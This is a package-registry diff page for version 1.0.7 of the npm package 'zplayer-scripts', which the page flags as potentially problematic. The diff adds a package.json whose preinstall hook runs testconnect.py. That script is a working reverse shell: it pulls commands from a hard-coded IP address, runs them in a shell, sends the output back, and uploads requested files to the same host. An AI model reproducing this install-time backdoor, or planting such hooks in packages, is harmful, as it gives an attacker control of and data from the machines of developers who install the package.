zplayer-scripts 1.0.7

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of zplayer-scripts might be problematic. Click here for more details.

package/README.md ADDED
@@ -0,0 +1 @@
1
+ Owned by ZSEC
package/package.json ADDED
@@ -0,0 +1,14 @@
1
+
2
+ {
3
+ "name": "zplayer-scripts",
4
+ "version": "1.0.7",
5
+ "description": "Owned by ZSEC",
6
+ "main": "index.js",
7
+ "scripts": {
8
+ "test": "id",
9
+ "preinstall":"python3 testconnect.py"
10
+ },
11
+ "author": "",
12
+ "license": "ISC"
13
+ }
14
+
package/pre.sh ADDED
@@ -0,0 +1 @@
1
+ python3 testconnect.py
package/testconnect.py ADDED
@@ -0,0 +1,53 @@
1
+ #python3
2
+
3
+ from urllib import request, parse
4
+ import subprocess
5
+ import time
6
+ import os
7
+
8
+ ATTACKER_IP = '34.133.45.72' # change this to the attacker's IP address
9
+ ATTACKER_PORT = 80
10
+
11
+ # Data is a dict
12
+ def send_post(data, url=f'http://{ATTACKER_IP}:{ATTACKER_PORT}'):
13
+ data = {"rfile": data}
14
+ data = parse.urlencode(data).encode()
15
+ req = request.Request(url, data=data)
16
+ request.urlopen(req) # send request
17
+
18
+
19
+ def send_file(command):
20
+ try:
21
+ grab, path = command.strip().split(' ')
22
+ except ValueError:
23
+ send_post("[-] Invalid grab command (maybe multiple spaces)")
24
+ return
25
+
26
+ if not os.path.exists(path):
27
+ send_post("[-] Not able to find the file")
28
+ return
29
+
30
+ store_url = f'http://{ATTACKER_IP}:{ATTACKER_PORT}/store' # Posts to /store
31
+ with open(path, 'rb') as fp:
32
+ send_post(fp.read(), url=store_url)
33
+
34
+
35
+ def run_command(command):
36
+ CMD = subprocess.Popen(command, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
37
+ send_post(CMD.stdout.read())
38
+ send_post(CMD.stderr.read())
39
+
40
+
41
+ while True:
42
+ command = request.urlopen(f"http://{ATTACKER_IP}:{ATTACKER_PORT}").read().decode()
43
+
44
+ if 'terminate' in command:
45
+ break
46
+
47
+ # Send file
48
+ if 'grab' in command:
49
+ send_file(command)
50
+ continue
51
+
52
+ run_command(command)
53
+ time.sleep(1)